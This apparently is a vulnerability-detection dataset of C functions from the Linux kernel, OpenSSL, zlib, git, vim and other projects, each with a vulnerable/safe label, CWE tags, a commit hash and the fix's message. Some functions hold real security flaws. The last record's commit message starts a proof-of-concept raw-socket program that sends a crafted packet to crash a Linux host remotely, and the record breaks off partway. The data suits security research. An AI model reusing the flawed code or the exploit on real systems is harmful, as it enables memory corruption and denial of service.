Limit the hardware's reported firmware string length (max 255 bytes) to
stay inside the driver's firmware string length (32 bytes). On overflow,
truncate the formatted firmware string instead of potentially overwriting
portions of the tg3 struct.
http://cansecwest.com/slides/2013/PrivateCore%20CSW%202013.pdf
Signed-off-by: Kees Cook <[email protected]>
Reported-by: Oded Horovitz <[email protected]>
Reported-by: Brad Spengler <[email protected]>
Cc: [email protected]
Cc: Matt Carlson <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
int ssh_buffer_reinit(struct ssh_buffer_struct *buffer)
{
if (buffer == NULL) {
return -1;
}
buffer_verify(buffer);
if (buffer->secure && buffer->allocated > 0) {
explicit_bzero(buffer->data, buffer->allocated);
}
buffer->used = 0;
buffer->pos = 0;
/* If the buffer is bigger then 64K, reset it to 64K */
if (buffer->allocated > 65536) {
int rc;
/* -1 for realloc_buffer magic */
rc = realloc_buffer(buffer, 65536 - 1);
if (rc != 0) {
return -1;
}
}
buffer_verify(buffer);
return 0;
}
| 0 |
[
"CWE-476"
] |
libssh-mirror
|
10b3ebbe61a7031a3dae97f05834442220447181
| 134,838,858,705,807,400,000,000,000,000,000,000,000 | 29 |
buffer: Reformat ssh_buffer_add_data()
Signed-off-by: Andreas Schneider <[email protected]>
Reviewed-by: Anderson Toshiyuki Sasaki <[email protected]>
Reviewed-by: Jakub Jelen <[email protected]>
|
static struct sctp_ulpevent *sctp_make_reassembled_event(struct sk_buff_head *queue, struct sk_buff *f_frag, struct sk_buff *l_frag)
{
struct sk_buff *pos;
struct sctp_ulpevent *event;
struct sk_buff *pnext, *last;
struct sk_buff *list = skb_shinfo(f_frag)->frag_list;
/* Store the pointer to the 2nd skb */
if (f_frag == l_frag)
pos = NULL;
else
pos = f_frag->next;
/* Get the last skb in the f_frag's frag_list if present. */
for (last = list; list; last = list, list = list->next);
/* Add the list of remaining fragments to the first fragments
* frag_list.
*/
if (last)
last->next = pos;
else
skb_shinfo(f_frag)->frag_list = pos;
/* Remove the first fragment from the reassembly queue. */
__skb_unlink(f_frag, queue);
while (pos) {
pnext = pos->next;
/* Update the len and data_len fields of the first fragment. */
f_frag->len += pos->len;
f_frag->data_len += pos->len;
/* Remove the fragment from the reassembly queue. */
__skb_unlink(pos, queue);
/* Break if we have reached the last fragment. */
if (pos == l_frag)
break;
pos->next = pnext;
pos = pnext;
};
event = sctp_skb2event(f_frag);
SCTP_INC_STATS(SCTP_MIB_REASMUSRMSGS);
return event;
}
| 1 |
[] |
linux-2.6
|
672e7cca17ed6036a1756ed34cf20dbd72d5e5f6
| 287,117,608,284,269,740,000,000,000,000,000,000,000 | 49 |
[SCTP]: Prevent possible infinite recursion with multiple bundled DATA.
There is a rare situation that causes lksctp to go into infinite recursion
and crash the system. The trigger is a packet that contains at least the
first two DATA fragments of a message bundled together. The recursion is
triggered when the user data buffer is smaller that the full data message.
The problem is that we clone the skb for every fragment in the message.
When reassembling the full message, we try to link skbs from the "first
fragment" clone using the frag_list. However, since the frag_list is shared
between two clones in this rare situation, we end up setting the frag_list
pointer of the second fragment to point to itself. This causes
sctp_skb_pull() to potentially recurse indefinitely.
Proposed solution is to make a copy of the skb when attempting to link
things using frag_list.
Signed-off-by: Vladislav Yasevich <[email protected]>
Signed-off-by: Sridhar Samudrala <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
alloc_clear_id(size_t size, alloc_id_T id UNUSED)
{
#ifdef FEAT_EVAL
if (alloc_fail_id == id && alloc_does_fail(size))
return NULL;
#endif
return alloc_clear(size);
}
| 0 |
[
"CWE-416"
] |
vim
|
9f1a39a5d1cd7989ada2d1cb32f97d84360e050f
| 102,476,859,141,161,700,000,000,000,000,000,000,000 | 8 |
patch 8.2.4040: keeping track of allocated lines is too complicated
Problem: Keeping track of allocated lines in user functions is too
complicated.
Solution: Instead of freeing individual lines keep them all until the end.
|
void mingw_startup(void)
{
int i, maxlen, argc;
char *buffer;
wchar_t **wenv, **wargv;
_startupinfo si;
/* get wide char arguments and environment */
si.newmode = 0;
if (__wgetmainargs(&argc, &wargv, &wenv, _CRT_glob, &si) < 0)
die_startup();
/* determine size of argv and environ conversion buffer */
maxlen = wcslen(_wpgmptr);
for (i = 1; i < argc; i++)
maxlen = max(maxlen, wcslen(wargv[i]));
for (i = 0; wenv[i]; i++)
maxlen = max(maxlen, wcslen(wenv[i]));
/*
* nedmalloc can't free CRT memory, allocate resizable environment
* list. Note that xmalloc / xmemdupz etc. call getenv, so we cannot
* use it while initializing the environment itself.
*/
environ_size = i + 1;
environ_alloc = alloc_nr(environ_size * sizeof(char*));
environ = malloc_startup(environ_alloc);
/* allocate buffer (wchar_t encodes to max 3 UTF-8 bytes) */
maxlen = 3 * maxlen + 1;
buffer = malloc_startup(maxlen);
/* convert command line arguments and environment to UTF-8 */
__argv[0] = wcstoutfdup_startup(buffer, _wpgmptr, maxlen);
for (i = 1; i < argc; i++)
__argv[i] = wcstoutfdup_startup(buffer, wargv[i], maxlen);
for (i = 0; wenv[i]; i++)
environ[i] = wcstoutfdup_startup(buffer, wenv[i], maxlen);
environ[i] = NULL;
free(buffer);
/* sort environment for O(log n) getenv / putenv */
qsort(environ, i, sizeof(char*), compareenv);
/* fix Windows specific environment settings */
setup_windows_environment();
/* initialize critical section for waitpid pinfo_t list */
InitializeCriticalSection(&pinfo_cs);
/* set up default file mode and file modes for stdin/out/err */
_fmode = _O_BINARY;
_setmode(_fileno(stdin), _O_BINARY);
_setmode(_fileno(stdout), _O_BINARY);
_setmode(_fileno(stderr), _O_BINARY);
/* initialize Unicode console */
winansi_init();
}
| 0 |
[
"CWE-20"
] |
git
|
6d8684161ee9c03bed5cb69ae76dfdddb85a0003
| 319,979,749,339,458,340,000,000,000,000,000,000,000 | 59 |
mingw: fix quoting of arguments
We need to be careful to follow proper quoting rules. For example, if an
argument contains spaces, we have to quote them. Double-quotes need to
be escaped. Backslashes need to be escaped, but only if they are
followed by a double-quote character.
We need to be _extra_ careful to consider the case where an argument
ends in a backslash _and_ needs to be quoted: in this case, we append a
double-quote character, i.e. the backslash now has to be escaped!
The current code, however, fails to recognize that, and therefore can
turn an argument that ends in a single backslash into a quoted argument
that now ends in an escaped double-quote character. This allows
subsequent command-line parameters to be split and part of them being
mistaken for command-line options, e.g. through a maliciously-crafted
submodule URL during a recursive clone.
Technically, we would not need to quote _all_ arguments which end in a
backslash _unless_ the argument needs to be quoted anyway. For example,
`test\` would not need to be quoted, while `test \` would need to be.
To keep the code simple, however, and therefore easier to reason about
and ensure its correctness, we now _always_ quote an argument that ends
in a backslash.
This addresses CVE-2019-1350.
Signed-off-by: Johannes Schindelin <[email protected]>
|
Field *Field_bit::new_key_field(MEM_ROOT *root, TABLE *new_table,
uchar *new_ptr, uint32 length,
uchar *new_null_ptr, uint new_null_bit)
{
Field_bit *res;
if ((res= (Field_bit*) Field::new_key_field(root, new_table, new_ptr, length,
new_null_ptr, new_null_bit)))
{
/* Move bits normally stored in null_pointer to new_ptr */
res->bit_ptr= new_ptr;
res->bit_ofs= 0;
if (bit_len)
res->ptr++; // Store rest of data here
}
return res;
}
| 0 |
[
"CWE-416",
"CWE-703"
] |
server
|
08c7ab404f69d9c4ca6ca7a9cf7eec74c804f917
| 135,675,982,109,438,070,000,000,000,000,000,000,000 | 16 |
MDEV-24176 Server crashes after insert in the table with virtual
column generated using date_format() and if()
vcol_info->expr is allocated on expr_arena at parsing stage. Since
expr item is allocated on expr_arena all its containee items must be
allocated on expr_arena too. Otherwise fix_session_expr() will
encounter prematurely freed item.
When table is reopened from cache vcol_info contains stale
expression. We refresh expression via TABLE::vcol_fix_exprs() but
first we must prepare a proper context (Vcol_expr_context) which meets
some requirements:
1. As noted above expr update must be done on expr_arena as there may
be new items created. It was a bug in fix_session_expr_for_read() and
was just not reproduced because of no second refix. Now refix is done
for more cases so it does reproduce. Tests affected: vcol.binlog
2. Also name resolution context must be narrowed to the single table.
Tested by: vcol.update main.default vcol.vcol_syntax gcol.gcol_bugfixes
3. sql_mode must be clean and not fail expr update.
sql_mode such as MODE_NO_BACKSLASH_ESCAPES, MODE_NO_ZERO_IN_DATE, etc
must not affect vcol expression update. If the table was created
successfully any further evaluation must not fail. Tests affected:
main.func_like
Reviewed by: Sergei Golubchik <[email protected]>
|
static int iwl_fw_txf_len(struct iwl_fw_runtime *fwrt,
struct iwl_fwrt_shared_mem_cfg *mem_cfg)
{
size_t hdr_len = sizeof(struct iwl_fw_error_dump_data) +
sizeof(struct iwl_fw_error_dump_fifo);
u32 fifo_len = 0;
int i;
if (!iwl_fw_dbg_type_on(fwrt, IWL_FW_ERROR_DUMP_TXF))
goto dump_internal_txf;
/* Count TXF sizes */
if (WARN_ON(mem_cfg->num_lmacs > MAX_NUM_LMAC))
mem_cfg->num_lmacs = MAX_NUM_LMAC;
for (i = 0; i < mem_cfg->num_lmacs; i++) {
int j;
for (j = 0; j < mem_cfg->num_txfifo_entries; j++)
ADD_LEN(fifo_len, mem_cfg->lmac[i].txfifo_size[j],
hdr_len);
}
dump_internal_txf:
if (!(iwl_fw_dbg_type_on(fwrt, IWL_FW_ERROR_DUMP_INTERNAL_TXF) &&
fw_has_capa(&fwrt->fw->ucode_capa,
IWL_UCODE_TLV_CAPA_EXTEND_SHARED_MEM_CFG)))
goto out;
for (i = 0; i < ARRAY_SIZE(mem_cfg->internal_txfifo_size); i++)
ADD_LEN(fifo_len, mem_cfg->internal_txfifo_size[i], hdr_len);
out:
return fifo_len;
}
| 0 |
[
"CWE-400",
"CWE-401"
] |
linux
|
b4b814fec1a5a849383f7b3886b654a13abbda7d
| 35,513,939,849,712,790,000,000,000,000,000,000,000 | 35 |
iwlwifi: dbg_ini: fix memory leak in alloc_sgtable
In alloc_sgtable if alloc_page fails, the alocated table should be
released.
Signed-off-by: Navid Emamdoost <[email protected]>
Signed-off-by: Luca Coelho <[email protected]>
|
int tls1_set_server_sigalgs(SSL *s)
{
int al;
size_t i;
/* Clear any shared sigtnature algorithms */
if (s->cert->shared_sigalgs) {
OPENSSL_free(s->cert->shared_sigalgs);
s->cert->shared_sigalgs = NULL;
}
/* Clear certificate digests and validity flags */
for (i = 0; i < SSL_PKEY_NUM; i++) {
s->cert->pkeys[i].digest = NULL;
s->cert->pkeys[i].valid_flags = 0;
}
/* If sigalgs received process it. */
if (s->cert->peer_sigalgs) {
if (!tls1_process_sigalgs(s)) {
SSLerr(SSL_F_TLS1_SET_SERVER_SIGALGS, ERR_R_MALLOC_FAILURE);
al = SSL_AD_INTERNAL_ERROR;
goto err;
}
/* Fatal error is no shared signature algorithms */
if (!s->cert->shared_sigalgs) {
SSLerr(SSL_F_TLS1_SET_SERVER_SIGALGS,
SSL_R_NO_SHARED_SIGATURE_ALGORITHMS);
al = SSL_AD_ILLEGAL_PARAMETER;
goto err;
}
} else
ssl_cert_set_default_md(s->cert);
return 1;
err:
ssl3_send_alert(s, SSL3_AL_FATAL, al);
return 0;
}
| 1 |
[] |
openssl
|
76343947ada960b6269090638f5391068daee88d
| 852,727,070,496,221,600,000,000,000,000,000,000 | 36 |
Fix for CVE-2015-0291
If a client renegotiates using an invalid signature algorithms extension
it will crash a server with a NULL pointer dereference.
Thanks to David Ramos of Stanford University for reporting this bug.
CVE-2015-0291
Reviewed-by: Tim Hudson <[email protected]>
Conflicts:
ssl/t1_lib.c
|
static unsigned virq_from_irq(unsigned irq)
{
struct irq_info *info = info_for_irq(irq);
BUG_ON(info == NULL);
BUG_ON(info->type != IRQT_VIRQ);
return info->u.virq;
}
| 0 |
[
"CWE-400",
"CWE-703"
] |
linux
|
e99502f76271d6bc4e374fe368c50c67a1fd3070
| 192,854,227,310,103,300,000,000,000,000,000,000,000 | 9 |
xen/events: defer eoi in case of excessive number of events
In case rogue guests are sending events at high frequency it might
happen that xen_evtchn_do_upcall() won't stop processing events in
dom0. As this is done in irq handling a crash might be the result.
In order to avoid that, delay further inter-domain events after some
time in xen_evtchn_do_upcall() by forcing eoi processing into a
worker on the same cpu, thus inhibiting new events coming in.
The time after which eoi processing is to be delayed is configurable
via a new module parameter "event_loop_timeout" which specifies the
maximum event loop time in jiffies (default: 2, the value was chosen
after some tests showing that a value of 2 was the lowest with an
only slight drop of dom0 network throughput while multiple guests
performed an event storm).
How long eoi processing will be delayed can be specified via another
parameter "event_eoi_delay" (again in jiffies, default 10, again the
value was chosen after testing with different delay values).
This is part of XSA-332.
Cc: [email protected]
Reported-by: Julien Grall <[email protected]>
Signed-off-by: Juergen Gross <[email protected]>
Reviewed-by: Stefano Stabellini <[email protected]>
Reviewed-by: Wei Liu <[email protected]>
|
inline bool WireFormatLite::ReadRepeatedPrimitive(
int, // tag_size, unused.
uint32_t tag, io::CodedInputStream* input, RepeatedField<CType>* values) {
CType value;
if (!ReadPrimitive<CType, DeclaredType>(input, &value)) return false;
values->Add(value);
int elements_already_reserved = values->Capacity() - values->size();
while (elements_already_reserved > 0 && input->ExpectTag(tag)) {
if (!ReadPrimitive<CType, DeclaredType>(input, &value)) return false;
values->AddAlreadyReserved(value);
elements_already_reserved--;
}
return true;
}
| 0 |
[
"CWE-703"
] |
protobuf
|
d1635e1496f51e0d5653d856211e8821bc47adc4
| 16,486,268,237,104,419,000,000,000,000,000,000,000 | 14 |
Apply patch
|
uint32_t ProtocolV2::get_onwire_size(const uint32_t logical_size) const {
if (session_stream_handlers.rx) {
return segment_onwire_size(logical_size);
} else {
return logical_size;
}
}
| 0 |
[
"CWE-323"
] |
ceph
|
20b7bb685c5ea74c651ca1ea547ac66b0fee7035
| 136,684,594,334,222,820,000,000,000,000,000,000,000 | 7 |
msg/async/ProtocolV2: avoid AES-GCM nonce reuse vulnerabilities
The secure mode uses AES-128-GCM with 96-bit nonces consisting of a
32-bit counter followed by a 64-bit salt. The counter is incremented
after processing each frame, the salt is fixed for the duration of
the session. Both are initialized from the session key generated
during session negotiation, so the counter starts with essentially
a random value. It is allowed to wrap, and, after 2**32 frames, it
repeats, resulting in nonce reuse (the actual sequence numbers that
the messenger works with are 64-bit, so the session continues on).
Because of how GCM works, this completely breaks both confidentiality
and integrity aspects of the secure mode. A single nonce reuse reveals
the XOR of two plaintexts and almost completely reveals the subkey
used for producing authentication tags. After a few nonces get used
twice, all confidentiality and integrity goes out the window and the
attacker can potentially encrypt-authenticate plaintext of their
choice.
We can't easily change the nonce format to extend the counter to
64 bits (and possibly XOR it with a longer salt). Instead, just
remember the initial nonce and cut the session before it repeats,
forcing renegotiation.
Signed-off-by: Ilya Dryomov <[email protected]>
Reviewed-by: Radoslaw Zarzynski <[email protected]>
Reviewed-by: Sage Weil <[email protected]>
Conflicts:
src/msg/async/ProtocolV2.h [ context: commit ed3ec4c01d17
("msg: Build target 'common' without using namespace in
headers") not in octopus ]
|
static int SetReqAttrib(byte* output, char* pw, int pwPrintableString,
int extSz)
{
const byte erOid[] =
{ ASN_OBJECT_ID, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01,
0x09, 0x0e };
int sz = 0; /* overall size */
int cpSz = 0; /* Challenge Password section size */
int cpSeqSz = 0;
int cpSetSz = 0;
int cpStrSz = 0;
int pwSz = 0;
int erSz = 0; /* Extension Request section size */
int erSeqSz = 0;
int erSetSz = 0;
byte cpSeq[MAX_SEQ_SZ];
byte cpSet[MAX_SET_SZ];
byte cpStr[MAX_PRSTR_SZ];
byte erSeq[MAX_SEQ_SZ];
byte erSet[MAX_SET_SZ];
output[0] = ASN_CONTEXT_SPECIFIC | ASN_CONSTRUCTED;
sz++;
if (pw && pw[0]) {
pwSz = (int)XSTRLEN(pw);
if (pwPrintableString) {
cpStrSz = SetPrintableString(pwSz, cpStr);
} else {
cpStrSz = SetUTF8String(pwSz, cpStr);
}
cpSetSz = SetSet(cpStrSz + pwSz, cpSet);
/* +2 for tag and length parts of the TLV triplet */
cpSeqSz = SetSequence(2 + sizeof(attrChallengePasswordOid) + cpSetSz +
cpStrSz + pwSz, cpSeq);
cpSz = cpSeqSz + 2 + sizeof(attrChallengePasswordOid) + cpSetSz +
cpStrSz + pwSz;
}
if (extSz) {
erSetSz = SetSet(extSz, erSet);
erSeqSz = SetSequence(erSetSz + sizeof(erOid) + extSz, erSeq);
erSz = extSz + erSetSz + erSeqSz + sizeof(erOid);
}
/* Put the pieces together. */
sz += SetLength(cpSz + erSz, &output[sz]);
if (cpSz) {
XMEMCPY(&output[sz], cpSeq, cpSeqSz);
sz += cpSeqSz;
sz += SetObjectId(sizeof(attrChallengePasswordOid), output + sz);
XMEMCPY(&output[sz], attrChallengePasswordOid,
sizeof(attrChallengePasswordOid));
sz += sizeof(attrChallengePasswordOid);
XMEMCPY(&output[sz], cpSet, cpSetSz);
sz += cpSetSz;
XMEMCPY(&output[sz], cpStr, cpStrSz);
sz += cpStrSz;
XMEMCPY(&output[sz], pw, pwSz);
sz += pwSz;
}
if (erSz) {
XMEMCPY(&output[sz], erSeq, erSeqSz);
sz += erSeqSz;
XMEMCPY(&output[sz], erOid, sizeof(erOid));
sz += sizeof(erOid);
XMEMCPY(&output[sz], erSet, erSetSz);
sz += erSetSz;
/* The actual extension data will be tacked onto the output later. */
}
return sz;
}
| 0 |
[
"CWE-125",
"CWE-345"
] |
wolfssl
|
f93083be72a3b3d956b52a7ec13f307a27b6e093
| 224,583,827,246,133,320,000,000,000,000,000,000,000 | 76 |
OCSP: improve handling of OCSP no check extension
|
isdn_net_force_hangup(char *name)
{
isdn_net_dev *p = isdn_net_findif(name);
struct net_device *q;
if (p) {
if (p->local->isdn_device < 0)
return 1;
q = p->local->slave;
/* If this interface has slaves, do a hangup for them also. */
while (q) {
isdn_net_hangup(q);
q = (((isdn_net_local *) q->priv)->slave);
}
isdn_net_hangup(p->dev);
return 0;
}
return -ENODEV;
}
| 0 |
[
"CWE-119"
] |
linux-2.6
|
0f13864e5b24d9cbe18d125d41bfa4b726a82e40
| 174,753,662,146,544,470,000,000,000,000,000,000,000 | 19 |
isdn: avoid copying overly-long strings
Addresses http://bugzilla.kernel.org/show_bug.cgi?id=9416
Signed-off-by: Karsten Keil <[email protected]>
Signed-off-by: Andrew Morton <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
MagickPrivate double GetResizeFilterWindowSupport(
const ResizeFilter *resize_filter)
{
assert(resize_filter != (ResizeFilter *) NULL);
assert(resize_filter->signature == MagickCoreSignature);
return(resize_filter->window_support);
}
| 0 |
[
"CWE-125"
] |
ImageMagick
|
c5402b6e0fcf8b694ae2af6a6652ebb8ce0ccf46
| 164,404,039,657,329,080,000,000,000,000,000,000,000 | 7 |
https://github.com/ImageMagick/ImageMagick/issues/717
|
vmw_user_surface_base_to_res(struct ttm_base_object *base)
{
return &(container_of(base, struct vmw_user_surface,
prime.base)->srf.res);
}
| 0 |
[
"CWE-20"
] |
linux
|
ee9c4e681ec4f58e42a83cb0c22a0289ade1aacf
| 328,180,809,027,078,020,000,000,000,000,000,000,000 | 5 |
drm/vmwgfx: limit the number of mip levels in vmw_gb_surface_define_ioctl()
The 'req->mip_levels' parameter in vmw_gb_surface_define_ioctl() is
a user-controlled 'uint32_t' value which is used as a loop count limit.
This can lead to a kernel lockup and DoS. Add check for 'req->mip_levels'.
References:
https://bugzilla.redhat.com/show_bug.cgi?id=1437431
Cc: <[email protected]>
Signed-off-by: Vladis Dronov <[email protected]>
Reviewed-by: Sinclair Yeh <[email protected]>
|
static struct input_device *input_device_new(struct btd_service *service)
{
struct btd_device *device = btd_service_get_device(service);
struct btd_profile *p = btd_service_get_profile(service);
const char *path = device_get_path(device);
const sdp_record_t *rec = btd_device_get_record(device, p->remote_uuid);
struct btd_adapter *adapter = device_get_adapter(device);
struct input_device *idev;
if (!rec)
return NULL;
idev = g_new0(struct input_device, 1);
bacpy(&idev->src, btd_adapter_get_address(adapter));
bacpy(&idev->dst, device_get_address(device));
idev->service = btd_service_ref(service);
idev->device = btd_device_ref(device);
idev->path = g_strdup(path);
idev->handle = rec->handle;
idev->disable_sdp = is_device_sdp_disable(rec);
/* Initialize device properties */
extract_hid_props(idev, rec);
return idev;
}
| 0 |
[] |
bluez
|
3cccdbab2324086588df4ccf5f892fb3ce1f1787
| 185,962,189,663,642,170,000,000,000,000,000,000,000 | 26 |
HID accepts bonded device connections only.
This change adds a configuration for platforms to choose a more secure
posture for the HID profile. While some older mice are known to not
support pairing or encryption, some platform may choose a more secure
posture by requiring the device to be bonded and require the
connection to be encrypted when bonding is required.
Reference:
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00352.html
|
static int imap_mbox_open_append(struct Mailbox *m, OpenMailboxFlags flags)
{
if (!m || !m->account)
return -1;
/* in APPEND mode, we appear to hijack an existing IMAP connection -
* ctx is brand new and mostly empty */
struct ImapAccountData *adata = imap_adata_get(m);
struct ImapMboxData *mdata = imap_mdata_get(m);
int rc = imap_mailbox_status(m, false);
if (rc >= 0)
return 0;
if (rc == -1)
return -1;
char buf[PATH_MAX + 64];
snprintf(buf, sizeof(buf), _("Create %s?"), mdata->name);
if (C_Confirmcreate && (mutt_yesorno(buf, MUTT_YES) != MUTT_YES))
return -1;
if (imap_create_mailbox(adata, mdata->name) < 0)
return -1;
return 0;
}
| 0 |
[
"CWE-94",
"CWE-74"
] |
neomutt
|
fb013ec666759cb8a9e294347c7b4c1f597639cc
| 236,214,489,535,406,820,000,000,000,000,000,000,000 | 26 |
tls: clear data after a starttls acknowledgement
After a starttls acknowledgement message, clear the buffers of any
incoming data / commands. This will ensure that all future data is
handled securely.
Co-authored-by: Pietro Cerutti <[email protected]>
|
local void fill_window(s)
deflate_state *s;
{
unsigned n;
unsigned more; /* Amount of free space at the end of the window. */
uInt wsize = s->w_size;
Assert(s->lookahead < MIN_LOOKAHEAD, "already enough lookahead");
do {
more = (unsigned)(s->window_size -(ulg)s->lookahead -(ulg)s->strstart);
/* Deal with !@#$% 64K limit: */
if (sizeof(int) <= 2) {
if (more == 0 && s->strstart == 0 && s->lookahead == 0) {
more = wsize;
} else if (more == (unsigned)(-1)) {
/* Very unlikely, but possible on 16 bit machine if
* strstart == 0 && lookahead == 1 (input done a byte at time)
*/
more--;
}
}
/* If the window is almost full and there is insufficient lookahead,
* move the upper half to the lower one to make room in the upper half.
*/
if (s->strstart >= wsize+MAX_DIST(s)) {
zmemcpy(s->window, s->window+wsize, (unsigned)wsize - more);
s->match_start -= wsize;
s->strstart -= wsize; /* we now have strstart >= MAX_DIST */
s->block_start -= (long) wsize;
if (s->insert > s->strstart)
s->insert = s->strstart;
slide_hash(s);
more += wsize;
}
if (s->strm->avail_in == 0) break;
/* If there was no sliding:
* strstart <= WSIZE+MAX_DIST-1 && lookahead <= MIN_LOOKAHEAD - 1 &&
* more == window_size - lookahead - strstart
* => more >= window_size - (MIN_LOOKAHEAD-1 + WSIZE + MAX_DIST-1)
* => more >= window_size - 2*WSIZE + 2
* In the BIG_MEM or MMAP case (not yet supported),
* window_size == input_size + MIN_LOOKAHEAD &&
* strstart + s->lookahead <= input_size => more >= MIN_LOOKAHEAD.
* Otherwise, window_size == 2*WSIZE so more >= 2.
* If there was sliding, more >= WSIZE. So in all cases, more >= 2.
*/
Assert(more >= 2, "more < 2");
n = read_buf(s->strm, s->window + s->strstart + s->lookahead, more);
s->lookahead += n;
/* Initialize the hash value now that we have some input: */
if (s->lookahead + s->insert >= MIN_MATCH) {
uInt str = s->strstart - s->insert;
s->ins_h = s->window[str];
UPDATE_HASH(s, s->ins_h, s->window[str + 1]);
#if MIN_MATCH != 3
Call UPDATE_HASH() MIN_MATCH-3 more times
#endif
while (s->insert) {
UPDATE_HASH(s, s->ins_h, s->window[str + MIN_MATCH-1]);
#ifndef FASTEST
s->prev[str & s->w_mask] = s->head[s->ins_h];
#endif
s->head[s->ins_h] = (Pos)str;
str++;
s->insert--;
if (s->lookahead + s->insert < MIN_MATCH)
break;
}
}
/* If the whole input has less than MIN_MATCH bytes, ins_h is garbage,
* but this is not important since only literal bytes will be emitted.
*/
} while (s->lookahead < MIN_LOOKAHEAD && s->strm->avail_in != 0);
/* If the WIN_INIT bytes after the end of the current data have never been
* written, then zero those bytes in order to avoid memory check reports of
* the use of uninitialized (or uninitialised as Julian writes) bytes by
* the longest match routines. Update the high water mark for the next
* time through here. WIN_INIT is set to MAX_MATCH since the longest match
* routines allow scanning to strstart + MAX_MATCH, ignoring lookahead.
*/
if (s->high_water < s->window_size) {
ulg curr = s->strstart + (ulg)(s->lookahead);
ulg init;
if (s->high_water < curr) {
/* Previous high water mark below current data -- zero WIN_INIT
* bytes or up to end of window, whichever is less.
*/
init = s->window_size - curr;
if (init > WIN_INIT)
init = WIN_INIT;
zmemzero(s->window + curr, (unsigned)init);
s->high_water = curr + init;
}
else if (s->high_water < (ulg)curr + WIN_INIT) {
/* High water mark at or above current data, but below current data
* plus WIN_INIT -- zero out to current data plus WIN_INIT, or up
* to end of window, whichever is less.
*/
init = (ulg)curr + WIN_INIT - s->high_water;
if (init > s->window_size - s->high_water)
init = s->window_size - s->high_water;
zmemzero(s->window + s->high_water, (unsigned)init);
s->high_water += init;
}
}
Assert((ulg)s->strstart <= s->window_size - MIN_LOOKAHEAD,
"not enough room for search");
}
| 0 |
[
"CWE-284",
"CWE-787"
] |
zlib
|
5c44459c3b28a9bd3283aaceab7c615f8020c531
| 273,267,894,767,552,230,000,000,000,000,000,000,000 | 120 |
Fix a bug that can crash deflate on some input when using Z_FIXED.
This bug was reported by Danilo Ramos of Eideticom, Inc. It has
lain in wait 13 years before being found! The bug was introduced
in zlib 1.2.2.2, with the addition of the Z_FIXED option. That
option forces the use of fixed Huffman codes. For rare inputs with
a large number of distant matches, the pending buffer into which
the compressed data is written can overwrite the distance symbol
table which it overlays. That results in corrupted output due to
invalid distances, and can result in out-of-bound accesses,
crashing the application.
The fix here combines the distance buffer and literal/length
buffers into a single symbol buffer. Now three bytes of pending
buffer space are opened up for each literal or length/distance
pair consumed, instead of the previous two bytes. This assures
that the pending buffer cannot overwrite the symbol table, since
the maximum fixed code compressed length/distance is 31 bits, and
since there are four bytes of pending space for every three bytes
of symbol space.
|
SecureElementStatus_t SecureElementRandomNumber( uint32_t* randomNum )
{
if( randomNum == NULL )
{
return SECURE_ELEMENT_ERROR_NPE;
}
*randomNum = SoftSeHalGetRandomNumber( );
return SECURE_ELEMENT_SUCCESS;
}
| 0 |
[
"CWE-120",
"CWE-787"
] |
LoRaMac-node
|
e3063a91daa7ad8a687223efa63079f0c24568e4
| 51,378,493,125,750,230,000,000,000,000,000,000,000 | 9 |
Added received buffer size checks.
|
static void oz_hcd_clear_orphanage(struct oz_hcd *ozhcd, int status)
{
if (ozhcd) {
struct oz_urb_link *urbl, *n;
list_for_each_entry_safe(urbl, n, &ozhcd->orphanage, link) {
list_del(&urbl->link);
oz_complete_urb(ozhcd->hcd, urbl->urb, status);
oz_free_urb_link(urbl);
}
}
}
| 0 |
[
"CWE-703",
"CWE-189"
] |
linux
|
b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c
| 124,029,465,584,536,600,000,000,000,000,000,000,000 | 12 |
ozwpan: Use unsigned ints to prevent heap overflow
Using signed integers, the subtraction between required_size and offset
could wind up being negative, resulting in a memcpy into a heap buffer
with a negative length, resulting in huge amounts of network-supplied
data being copied into the heap, which could potentially lead to remote
code execution.. This is remotely triggerable with a magic packet.
A PoC which obtains DoS follows below. It requires the ozprotocol.h file
from this module.
=-=-=-=-=-=
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
} __packed connect_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
